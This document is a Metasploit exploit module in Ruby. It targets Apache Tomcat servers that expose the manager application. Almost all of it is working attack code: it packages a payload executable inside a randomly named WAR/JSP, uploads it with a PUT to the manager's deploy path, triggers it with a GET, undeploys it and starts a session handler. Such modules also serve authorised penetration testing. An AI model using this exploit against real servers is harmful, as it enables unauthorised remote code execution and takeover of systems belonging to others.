Apache Tomcat Manager Application Deployer Upload and Execute

`##  
# $Id: tomcat_mgr_deploy.rb 8552 2010-02-18 18:18:43Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Apache Tomcat Manager Application Deployer Upload and Execute',  
'Description' => %q{  
This module can be used to execute a payload on Apache Tomcat servers that  
have an exposed "manager" application. The payload is uploaded as a WAR archive  
containing a jsp application using a PUT request.  
  
The manager application can also be abused using /manager/html/upload, but that  
method is not implemented in this module.  
},  
'Author' => [ 'jduck' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 8552 $',  
'References' =>  
[  
# There is no single vulnerability associated with deployment functionality.  
# Instead, the focus has been on insecure/blank/hardcoded default passwords.  
  
# The following references refer to HP Operations Manager  
[ 'CVE', '2009-3843' ],  
[ 'OSVDB', '60317' ],  
  
# tomcat docs  
[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]  
],  
'Platform' => [ 'win' ],  
'Targets' =>  
[  
[ 'Automatic', { } ],  
],  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('PATH', [ true, "The URI path of the manager app (/deploy and /undeploy will be used)", '/manager'])  
], self.class)  
end  
  
  
def exploit  
  
# TODO: autodetect arch/platform from /manager/serverinfo and/or db notes  
arch = ARCH_X86  
plat = [Msf::Module::Platform::Windows]  
  
# Generate the WAR containing the EXE containing the payload  
jsp_name = rand_text_alphanumeric(4+rand(32-4))  
war = Msf::Util::EXE.to_jsp_war(framework,  
arch, plat,  
payload.encoded,  
:jsp_name => jsp_name)  
  
app_base = rand_text_alphanumeric(4+rand(32-4))  
app_name = app_base + ".war"  
query_str = "?path=/" + app_base  
  
#  
# UPLOAD  
#  
path_tmp = datastore['PATH'] + "/deploy" + query_str  
print_status("Uploading #{war.length} bytes as #{app_name}...")  
res = send_request_cgi({  
'uri' => path_tmp,  
'method' => 'PUT',  
'ctype' => 'application/octet-stream',  
'data' => war,  
}, 20)  
if (! res)  
raise RuntimeError, "Upload failed on #{path_tmp} [No Response]"  
end  
if (res.code < 200 or res.code >= 300)  
case res.code  
when 401  
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")  
end  
raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]"  
end  
  
  
#  
# EXECUTE  
#  
print_status("Executing #{app_base}...")  
res = send_request_cgi({  
'uri' => '/' + app_base + '/' + jsp_name + '.jsp',  
'method' => 'GET'  
}, 20)  
  
if (! res)  
print_error("Execution failed on #{app_base} [No Response]")  
elsif (res.code < 200 or res.code >= 300)  
print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")  
end  
  
  
#  
# DELETE  
#  
path_tmp = datastore['PATH'] + "/undeploy" + query_str  
print_status("Undeploying #{app_base} ...")  
res = send_request_cgi({  
'uri' => path_tmp,  
'method' => 'GET'  
}, 20)  
if (! res)  
print_error("WARNING: Undeployment failed on #{path} [No Response]")  
elsif (res.code < 200 or res.code >= 300)  
print_error("Deletion failed on #{path} [#{res.code} #{res.message}]")  
end  
  
handler  
end  
  
end  
`